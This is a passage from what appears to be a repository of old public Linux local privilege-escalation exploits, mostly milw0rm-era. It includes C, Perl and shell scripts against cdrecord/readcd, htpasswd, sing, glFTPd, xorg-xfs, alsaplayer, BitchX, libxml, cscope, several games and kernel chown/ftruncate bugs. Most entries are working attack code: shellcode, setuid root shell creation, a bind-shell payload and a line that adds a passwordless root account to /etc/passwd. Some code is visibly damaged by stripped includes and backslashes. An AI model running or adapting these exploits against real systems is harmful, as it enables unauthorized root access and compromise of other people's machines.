fd1, fd2; 17 | int count; 18 | char buffer[1]; 19 | 20 | /* Set ID's */ 21 | setuid( geteuid() ); 22 | setgid( geteuid() ); 23 | 24 | /* Copy the shell */ 25 | if ((fd1=open( "/bin/bash", O_RDONLY))<0) 26 | return -1; 27 | if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0) 28 | return -1; 29 | while((count=read(fd1, buffer, 1))) 30 | write(fd2, buffer, count); 31 | free(buffer); 32 | close( fd1 ); 33 | close( fd2 ); 34 | 35 | /* Priv the shell */ 36 | chown( "./bash", geteuid(), geteuid() ); 37 | chmod( "./bash", 3565 ); 38 | } 39 | __EOF__ 40 | 41 | cc ./cpbinbash.c -o ./cpbinbash 42 | 43 | # Set up environment 44 | export RSHSAVE=$RSH 45 | export RSH=./cpbinbash 46 | 47 | # Sploit 48 | cdrecord dev= REMOTE:CAU:1,0,0 - 49 | 50 | # Cleanup 51 | rm cpbinbash* 52 | export RSH=$RSHSAVE 53 | export RSHSAVE= 54 | 55 | # Use our suid bash 56 | ./bash -p 57 | 58 | // milw0rm.com [2004-09-11] 59 | -------------------------------------------------------------------------------- /linux/linux_exploits/466.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Proof Of Concept exploit for htpasswd of Apache. 3 | # Read the advisory for more information. 4 | # - Luiz Fernando Camargo 5 | # - foxtrot_at_flowsecurity.org 6 | $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68". 7 | "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 8 | 9 | 10 | $target = "/usr/local/apache/bin/htpasswd"; 11 | $retaddr = 0xbffffffa - length($shellcode) - length($target); 12 | 13 | 14 | print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 15 | 16 | 17 | local($ENV{'XXX'}) = $shellcode; 18 | $newret = pack('l', $retaddr); 19 | $buffer = "A" x 272; 20 | $buffer .= $newret x 4; 21 | $buffer .= " "; 22 | $buffer .= "B" x 290; 23 | 24 | 25 | exec("$target -nb $buffer"); 26 | 27 | # milw0rm.com [2004-09-16] 28 | -------------------------------------------------------------------------------- /linux/linux_exploits/469.c: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "readcd-exp.sh -- ReadCD local exploit ( Test on cdrecord-2.01-0.a27.2mdk)" 4 | echo "Author : newbug [at] chroot.org" 5 | echo "Date :09.13.2004" 6 | echo "IRC : irc.chroot.org #discuss" 7 | 8 | export READCD=/usr/bin/readcd 9 | cd /tmp 10 | 11 | cat > s.c <<_EOF_ 12 | #include 13 | #include 14 | #include 15 | 16 | int main() 17 | { 18 | setuid(0);setgid(0); 19 | chown("/tmp/ss", 0, 0); 20 | chmod("/tmp/ss", 04755); 21 | 22 | return 0; 23 | } 24 | 25 | _EOF_ 26 | 27 | cat > ss.c <<_EOF_ 28 | #include 29 | 30 | int main() 31 | { 32 | setuid(0);setgid(0); 33 | execl("/bin/bash","bash",(char *)0); 34 | 35 | return 0; 36 | } 37 | _EOF_ 38 | 39 | gcc -o s s.c 40 | gcc -o ss ss.c 41 | 42 | export RSH=/tmp/s 43 | $READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1 44 | /tmp/ss 45 | 46 | 47 | // milw0rm.com [2004-09-19] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/4698.c: -------------------------------------------------------------------------------- 1 | /* 2 | sing file append exploit 3 | by bannedit 4 | 5 | 12/05/2007 6 | 7 | The original reporter of this issue included an example session which 8 | added an account to the machine. 9 | 10 | The method for this exploit is slightly different and much more 11 | quiet. Although it relies upon logrotate for help. 12 | 13 | This could easily be modified to work with cron daemons which 14 | are not too strict about the cron file format. However, 15 | when I tested vixie cron it appears that there are 16 | better checks for file format compilance these days. 17 | */ 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | #define SING_PATH "/usr/bin/sing" 24 | 25 | char *file = "/etc/logrotate.d/sing"; 26 | char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n"; 27 | 28 | 29 | 30 | int main() 31 | { 32 | FILE *fp; 33 | int pid; 34 | 35 | puts("sing file append exploit"); 36 | puts("------------------------"); 37 | puts("by bannedit"); 38 | 39 | if(fp = fopen("/tmp/shell", "w+")) 40 | { 41 | fputs("#!/bin/bash\n", fp); 42 | fputs("/bin/bash -p", fp); 43 | fclose(fp); 44 | system("touch /tmp/sing; echo garbage >> /tmp/sing"); 45 | } 46 | else 47 | { 48 | puts("error making shell file"); 49 | exit(-1); 50 | } 51 | 52 | sleep(5); 53 | printf("done sleeping...\n"); 54 | execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); 55 | return 0; 56 | } 57 | 58 | // milw0rm.com [2007-12-06] 59 | -------------------------------------------------------------------------------- /linux/linux_exploits/470.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/470.c -------------------------------------------------------------------------------- /linux/linux_exploits/476.c: -------------------------------------------------------------------------------- 1 | /* glFTPd local stack buffer overflow exploit 2 | (Proof of Concept) 3 | 4 | Tested in Slackware 9.0 / 9.1 / 10.0 5 | 6 | by CoKi 7 | No System Group - http://www.nosystem.com.ar 8 | */ 9 | 10 | #include <'stdio.h> 11 | #include <'strings.h> 12 | #include <'unistd.h> 13 | 14 | #define BUFFER 288 + 1 15 | #define PATH "/glftpd/bin/dupescan" 16 | 17 | char shellcode[]= 18 | "xb0x31xcdx80x89xc3x31xc0xb0x17xcdx80" 19 | "x31xdbx31xc0xb0x17xcdx80" 20 | "xebx1fx5ex89x76x08x31xc0x89x46x0cx88x46x07" 21 | "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb" 22 | "x89xd8x40xcdx80xe8xdcxffxffxff/bin/sh"; 23 | 24 | int main(void) { 25 | 26 | char *env[3] = {shellcode, NULL}; 27 | char buf[BUFFER], *path; 28 | int *buffer = (int *) (buf); 29 | int i; 30 | int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH); 31 | 32 | for(i=0; i<=BUFFER; i+=4) 33 | *buffer++ = ret; 34 | 35 | printf(" glFTPd local stack buffer overflow (Proof of Concept) "); 36 | printf(" by CoKi "); 37 | 38 | execle(PATH, "dupescan", buf, NULL, env); 39 | } 40 | 41 | 42 | // milw0rm.com [2004-09-23] 43 | -------------------------------------------------------------------------------- /linux/linux_exploits/5167.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103) 3 | # 4 | # Another lame xploit by vl4dZ :)) works on redhat el5 and before 5 | # 6 | # $ id 7 | # uid=1001(kecos) gid=1001(user) groups=1001(user) 8 | # $ sh xfs-RaceCondition-root-exploit.sh 9 | # [*] Generate large data file in /tmp/.font-unix 10 | # [*] Wait for xfs service to be (re)started by root... 11 | # [*] Hop, symlink created... 12 | # [*] Launching root shell 13 | # -sh-3.1# id 14 | # uid=0(root) gid=0(root) groups=0(root) 15 | 16 | # Vulnerable version is xorg-x11-xfs <= 1.0.2-3.1 and vulnerable code is 17 | # located in the start() function of the /etc/init.d/xfs script: 18 | # ... 19 | # rm -rf $FONT_UNIX_DIR 20 | # mkdir $FONT_UNIX_DIR 21 | # chown root:root $FONT_UNIX_DIR 22 | # chmod 1777 $FONT_UNIX_DIR 23 | # ... 24 | 25 | # I'm listening right now to nice free music: 26 | # http://www.jamendo.com/fr/album/5919 27 | 28 | FontDir="/tmp/.font-unix" 29 | Zero=/dev/zero 30 | Size=900000 31 | 32 | if [ ! -d $FontDir ]; then 33 | printf "Is xfs running ?\n" 34 | exit 1 35 | fi 36 | 37 | cd /tmp 38 | cat > sym.c << EOF 39 | #include 40 | int main(){ 41 | for(;;){if(symlink("/etc/passwd","/tmp/.font-unix")==0) 42 | {return 0;}}} 43 | EOF 44 | 45 | cc sym.c -o sym>/dev/null 2>&1 46 | if [ $? != 0 ]; then 47 | printf "Error: Cant compile code" 48 | exit 1 49 | fi 50 | 51 | printf "[*] Generate large data file in $FontDir\n" 52 | dd if=${Zero} of=${FontDir}/BigFile bs=1024 count=${Size}>/dev/null 2>&1 53 | if [ $? != 0 ]; then 54 | printf "Error: cant create large file" 55 | exit 1 56 | fi 57 | 58 | printf "[*] Wait for xfs service to be (re)started by root...\n" 59 | ./sym 60 | if [ $? != 0 ]; then 61 | printf "Error: code failed...\n" 62 | exit 1 63 | fi 64 | 65 | if [ -L /tmp/.font-unix ]; then 66 | printf "[*] Hop, symlink created...\n" 67 | printf "[*] Launching root shell\n" 68 | sleep 2 69 | rm -f /tmp/.font-unix 70 | echo "r00t::0:0::/:/bin/sh" >> /etc/passwd 71 | fi 72 | su - r00t 73 | 74 | # milw0rm.com [2008-02-21] 75 | -------------------------------------------------------------------------------- /linux/linux_exploits/5424.txt: -------------------------------------------------------------------------------- 1 | I have released this exploit for the alsaplayer bug CVE-2007-5301. 2 | 3 | You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ 4 | 5 | With my modified version of vorbiscomment, you can generate a ogg exploit like this: 6 | 7 | whats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 11 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 12 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 14 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 15 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 16 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 17 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 18 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 19 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 20 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 21 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 22 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 23 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 24 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 25 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 26 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\x77\xe7 27 | \xff\xff\x08\x08\x08\x08\x29\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e 28 | \x46\x90\xbe\x13\x83\xee\xfc\xe2\xf4\x2c\x9b\xe6\x8a\x14\xf6\xd6\x3e\x25\x19\x59\x7b 29 | \x69\xe3\xd6\x13\x2e\xbf\xdc\x7a\x28\x19\x5d\x41\xae\x9c\xbe\x13\x46\xbf\xcb\x60\x34 30 | \xbf\xdc\x7a\x28\xbf\xd7\x77\x46\xc7\xed\x9a\xa7\x5d\x3e\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg 31 | 32 | Then, if you plays the file with the vulnerable version: 33 | 34 | whats@debian:~$ alsaplayer exploit.ogg 35 | uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats) 36 | 37 | This was tested with the debian etch packages. 38 | 39 | - whats 40 | 41 | # milw0rm.com [2008-04-10] 42 | -------------------------------------------------------------------------------- /linux/linux_exploits/586.c: -------------------------------------------------------------------------------- 1 | // BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-) 2 | // este exploit se lo dedico a mi chica. 3 | // 0xC0000000-4-strlen(argv[1])-1-strlen(buffer) 4 | // 2052 to the ret 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | char payload[69]; 12 | char sha0code[] = 13 | "\xeb\x16\x5b\x31\xc0" 14 | "\x50\x53\xb0\x0b\x89" 15 | "\xdb\x89\xe1\x31\xd2" 16 | "\xcd\x80\x31\xc0\x40" 17 | "\x31\xdb\xcd\x80\xe8" 18 | "\xe5\xff\xff\xff\x2f" 19 | "\x62\x69\x6e\x2f\x73\x68"; 20 | 21 | 22 | void nopea (void); 23 | 24 | int main (int argc, char **argv) { 25 | 26 | char *buff; 27 | char *arg1="bash"; 28 | char *arg2="-c"; 29 | char *arg[]={arg1,arg2,buff,NULL}; 30 | char *env[]={"TERM=xterm",payload,NULL}; 31 | char offset[]=""; 32 | char sret[4]; 33 | unsigned long lret; 34 | int i; 35 | 36 | if (argc != 2) { 37 | fprintf (stdout,"BitchX exploit Coded By Sha0\n"); 38 | fprintf (stdout,"ej: %s /usr/bin/BitchX\n\n",argv[0]); 39 | return (1); 40 | } 41 | 42 | buff = (char *)malloc (2100); 43 | bzero (buff,sizeof(buff)); 44 | arg[2] = buff; 45 | 46 | nopea (); 47 | 48 | lret = 0xbffffffa - strlen(payload) - strlen(argv[1]); 49 | sret[0] = (0x000000ff & lret); 50 | sret[1] = (0x0000ff00 & lret) >> 8; 51 | sret[2] = (0x00ff0000 & lret) >> 16; 52 | sret[3] = (0xff000000 & lret) >> 24; 53 | 54 | for (i=0;i<2088;i+=4) // 2088 tirando largo. 55 | memcpy (buff+i,sret,4); 56 | 57 | execve (argv[1],arg,env); 58 | perror ("execve()"); 59 | 60 | free (buff); 61 | return (0); 62 | } 63 | 64 | 65 | void nopea (void) { 66 | bzero (payload,sizeof(payload)); 67 | memset (payload,0x90,sizeof(payload)-1); 68 | memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code)); 69 | } 70 | 71 | // milw0rm.com [2004-10-20] 72 | -------------------------------------------------------------------------------- /linux/linux_exploits/591.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/591.c -------------------------------------------------------------------------------- /linux/linux_exploits/601.c: -------------------------------------------------------------------------------- 1 | /* 2 | * libxml 2.6.12 nanoftp bof POC infamous42mdAThotpopDOTcom 3 | * 4 | * [n00b localho outernet] gcc -Wall libsuxml.c -lxml2 5 | * [n00b localho outernet] ./a.out 6 | * Usage: ./a.out [ align ] 7 | * [n00b localho outernet] netstat -ant | grep 7000 8 | * [n00b localho outernet] ./a.out 0xbfff0360 9 | * xmlNanoFTPScanURL: Use [IPv6]/IPv4 format 10 | * [n00b localho outernet] netstat -ant | grep 7000 11 | * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 12 | 13 | * 14 | */ 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | #define die(x) do{ perror((x)); exit(1); }while(0) 25 | #define BS 0x10000 26 | #define NOP 0x90 27 | #define NNOPS 3000 28 | #define ALIGN 0 29 | 30 | /* call them */ 31 | #define SHELL_LEN (sizeof(sc)-1) 32 | char sc[] = 33 | "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" 34 | "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" 35 | "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" 36 | "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" 37 | "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" 38 | "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" 39 | "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" 40 | "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 41 | 42 | 43 | /* 44 | */ 45 | int main(int argc, char **argv) 46 | { 47 | int x = 0, len = 0; 48 | char buf[BS] = {'A',}; 49 | long retaddr = 0, align = ALIGN; 50 | 51 | if(argc < 2){ 52 | fprintf(stderr, "Usage: %s [ align ]\n", argv[0]); 53 | return EXIT_FAILURE; 54 | } 55 | if(sscanf(argv[1], "%lx", &retaddr) != 1) 56 | die("sscanf"); 57 | if(argc > 2) 58 | align = atoi(argv[2]); 59 | if(align < 0 || align > 3) 60 | die("nice try newblar"); 61 | 62 | strncpy(buf, "://[", 4); 63 | len += 4; 64 | memset(buf+len, NOP, NNOPS); 65 | len += NNOPS; 66 | memcpy(buf+len, sc, SHELL_LEN); 67 | len += SHELL_LEN; 68 | 69 | len += align; 70 | for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr)) 71 | memcpy(buf+len+x, &retaddr, sizeof(retaddr)); 72 | buf[len+x] = ']'; 73 | buf[len+x+1] = 0; 74 | 75 | xmlNanoFTPNewCtxt(buf); 76 | 77 | return EXIT_SUCCESS; 78 | } 79 | 80 | // milw0rm.com [2004-10-26] 81 | -------------------------------------------------------------------------------- /linux/linux_exploits/6851.c: -------------------------------------------------------------------------------- 1 | /* 2 | gw-ftrex.c: 3 | 4 | Linux kernel < 2.6.22 open/ftruncate local exploit 5 | by 6 | 7 | bug information: 8 | http://osvdb.org/49081 9 | 10 | 11 | !!!This is for educational purposes only!!! 12 | 13 | To use it, you've got to find a sgid directory you've got 14 | permissions to write into (obviously world-writable), e.g: 15 | find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx" 16 | which fortunately is not common those days :) 17 | And also a shell that does not drop sgid privs upon execution (like ash/sash). 18 | E.g: 19 | 20 | test:/fileserver/samba$ ls -ld 21 | drwxrwsrwx 2 root root 4096 2008-10-27 16:27. 22 | test:/fileserver/samba$ id 23 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 24 | test:/fileserver/samba$ /tmp/gw-ftrex 25 | ash shell found! 26 | size=80200 27 | We're evil evil evil! 28 | 29 | $ id 30 | uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data) 31 | 32 | Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia. 33 | */ 34 | 35 | 36 | 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | int main(int argc, char *argv[]) 43 | { 44 | char *buf=malloc(3096*1024); //3mb just to be sure 45 | int a,len; 46 | int fd,fd1; 47 | char *buf1; 48 | int shell=0; 49 | 50 | 51 | if (stat("/bin/ash",buf)==0) 52 | { 53 | printf("ash shell found!\n"); 54 | shell=1; 55 | } 56 | 57 | if (shell==0) if (stat("/bin/sash",buf)==0) 58 | { 59 | printf("sash shell found!\n"); 60 | shell=1; 61 | } 62 | 63 | if (shell==0) 64 | { 65 | printf("no suitable shell found (one that does not drop sgid permissions) :(\n"); 66 | exit(2); 67 | } 68 | 69 | 70 | len=0; 71 | if (shell==1) fd=open("/bin/ash",O_RDONLY); 72 | if (shell==2) fd=open("/bin/sash",O_RDONLY); 73 | 74 | while (read(fd,buf+len,1)) len++; 75 | 76 | printf("size=%d\n",len); 77 | fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750); 78 | ftruncate(fd1, len); 79 | buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0); 80 | memcpy(buf1,buf,len); 81 | munmap(buf1,len); 82 | close(fd1);close(fd); 83 | free(buf); 84 | printf("We're evil evil evil!\n\n"); 85 | execv(".evilsploit", NULL); 86 | } 87 | 88 | // milw0rm.com [2008-10-27] 89 | -------------------------------------------------------------------------------- /linux/linux_exploits/695.c: -------------------------------------------------------------------------------- 1 | /* RXcscope exploit version 15.5 and minor */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define BSIZE 64 8 | 9 | int 10 | main(int ac, char *av[]) { 11 | pid_t cur; 12 | u_int i=0, lst; 13 | char buffer[BSIZE + 1]; 14 | 15 | fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\ 16 | " version 15.5 and minor \n" \ 17 | " Gangstuck / Psirac\n" \ 18 | " \n\n"); 19 | 20 | if (ac != 3) { 21 | fprintf(stderr, "Usage: %s \n", av[0]); 22 | return 1; 23 | } 24 | 25 | cur=getpid(); 26 | lst=cur+atoi(av[2]); 27 | 28 | fprintf(stdout, " -> Current process id is ..... [%5d]\n" \ 29 | " -> Last process id is ........ [%5d]\n", cur, lst); 30 | 31 | while (++cur != lst) { 32 | snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i); 33 | symlink(av[1], buffer); 34 | } 35 | 36 | return 0; 37 | } 38 | 39 | // milw0rm.com [2004-12-17] 40 | -------------------------------------------------------------------------------- /linux/linux_exploits/71.c: -------------------------------------------------------------------------------- 1 | /* 0x333xgalaga => XGalaga 2.0.34 local game exploit (Red Hat 9.0) 2 | * 3 | * tested against xgalaga-2.0.34-1.i386.rpm 4 | * under Red Hat Linux 9.0 5 | * 6 | * - bug found by Steve Kemp 7 | * - exploit coded by c0wboy @ 0x333 8 | * 9 | * (c) 0x333 Outsider Security Labs / www.0x333.org 10 | * 11 | */ 12 | 13 | 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | #define BIN "/usr/X11R6/bin/xgalaga" 20 | #define SIZE 264 21 | 22 | #define RET 0xbffffe2c /* tested against Red Hat Linux 9.0 */ 23 | #define NOP 0x90 24 | 25 | 26 | unsigned char shellcode[] = 27 | 28 | /* setregid (20,20) shellcode */ 29 | "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47" 30 | "\xcd\x80" 31 | 32 | /* exec /bin/sh shellcode */ 33 | 34 | "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" 35 | "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; 36 | 37 | 38 | void banner (void); 39 | void memret (char *, int, int, int); 40 | 41 | 42 | void banner (void) 43 | { 44 | fprintf (stdout, "\n\n --- xgalaga local GAME exploit by c0wboy ---\n"); 45 | fprintf (stdout, " --- Outsiders Se(c)urity Labs / www.0x333.org ---\n\n"); 46 | } 47 | 48 | 49 | void memret (char *buffer, int ret, int size, int align) 50 | { 51 | int i; 52 | int * ptr = (int *) (buffer + align); 53 | 54 | for (i=0; i 6 | * 7 | * Unknown vulnerability in Linux kernel 2.x may allow local users to 8 | * modify the group ID of files, such as NFS exported files in kernel 9 | * 2.4 (CAN-2004-0497). 10 | * 11 | * "Basically, you can change the group of a file you don't own, but not 12 | * of an SGID executable." -- Solar Designer (0dd) 13 | * 14 | * On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you 15 | * don't own, even on local filesystems. This may allow a local attacker to 16 | * perform a privilege escalation, e.g. through the following attack vectors: 17 | * 18 | * 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian 19 | * 3.0, probably others) the shadow group has read access to it. 20 | * 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents. 21 | * 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks. 22 | * 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands. 23 | * 24 | * Usage: 25 | * $ gcc raptor_chown.c -o raptor_chown -Wall 26 | * $ ./raptor_chown /etc/shadow 27 | * [...] 28 | * -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow 29 | * 30 | * Vulnerable platforms: 31 | * Linux 2.2.x (on nfs exported files, should be vuln) [untested] 32 | * Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested] 33 | * Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested] 34 | */ 35 | 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | #define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux" 43 | #define INFO2 "Copyright (c) 2004 Marco Ivaldi " 44 | 45 | int main(int argc, char **argv) 46 | { 47 | char cmd[256]; 48 | 49 | /* print exploit information */ 50 | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); 51 | 52 | /* read command line */ 53 | if (argc != 2) { 54 | fprintf(stderr, "usage: %s file_name\n\n", argv[0]); 55 | exit(1); 56 | } 57 | 58 | /* ninpou: sys_chown no jutsu! */ 59 | if (chown(argv[1], -1, getgid()) < 0) { 60 | switch(errno) { 61 | case EPERM: 62 | fprintf(stderr, "Error: Not vulnerable!\n"); 63 | break; 64 | default: 65 | perror("Error"); 66 | } 67 | exit(1); 68 | } 69 | fprintf(stderr, "Ninpou: sys_chown no jutsu!\n"); 70 | 71 | /* print some output */ 72 | sprintf(cmd, "/bin/ls -l %s", argv[1]); 73 | system(cmd); 74 | 75 | exit(0); 76 | } 77 | 78 | // milw0rm.com [2004-12-24] 79 | -------------------------------------------------------------------------------- /linux/linux_exploits/72.c: -------------------------------------------------------------------------------- 1 | /* 2 | * xtokkaetama 1.0b local game exploit on Red Hat 9.0 3 | * Coded by brahma (31/07/2003) 4 | * 5 | * http://www.debian.org/security/2003/dsa-356 6 | */ 7 | 8 | 9 | #include 10 | #define RETADDR 0xbfffff11 11 | #define DEFAULT_BUFFER_SIZE 29 12 | #define DEFAULT_EGG_SIZE 512 13 | #define NOP 0x90 14 | #define BIN "/usr/X11R6/bin/xtokkaetama" 15 | char shellcode[] = 16 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 17 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 18 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 19 | 20 | unsigned long get_esp(void) { 21 | __asm__("movl %esp,%eax"); 22 | } 23 | 24 | void main(int argc, char *argv[]) { 25 | char *buff, *ptr, *egg; 26 | long *addr_ptr, addr; 27 | int bsize=DEFAULT_BUFFER_SIZE; 28 | int i, eggsize=DEFAULT_EGG_SIZE; 29 | 30 | if (argc > 1) bsize = atoi(argv[1]); 31 | if (argc > 2) eggsize = atoi(argv[2]); 32 | 33 | 34 | if (!(buff = malloc(bsize))) { 35 | printf("Can't allocate memory.\n"); 36 | exit(0); 37 | } 38 | if (!(egg = malloc(eggsize))) { 39 | printf("Can't allocate memory.\n"); 40 | exit(0); 41 | } 42 | 43 | addr = RETADDR; 44 | printf("Using address: 0x%x\n", addr); 45 | 46 | ptr = buff; 47 | addr_ptr = (long *) ptr; 48 | for (i = 0; i < bsize; i+=4) 49 | *(addr_ptr++) = addr; 50 | 51 | ptr = egg; 52 | for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) 53 | *(ptr++) = NOP; 54 | 55 | for (i = 0; i < strlen(shellcode); i++) 56 | *(ptr++) = shellcode[i]; 57 | 58 | buff[bsize - 1] = '\0'; 59 | egg[eggsize - 1] = '\0'; 60 | 61 | memcpy(egg,"EGG=",4); 62 | putenv(egg); 63 | execl(BIN,BIN,"-display",buff,NULL); 64 | } 65 | 66 | 67 | 68 | // milw0rm.com [2003-08-01] 69 | -------------------------------------------------------------------------------- /linux/linux_exploits/7313.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash - 2 | 3 | echo ' 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | int main(int argc, char *argv[]) 12 | { 13 | struct utmp entry; 14 | int i; 15 | 16 | 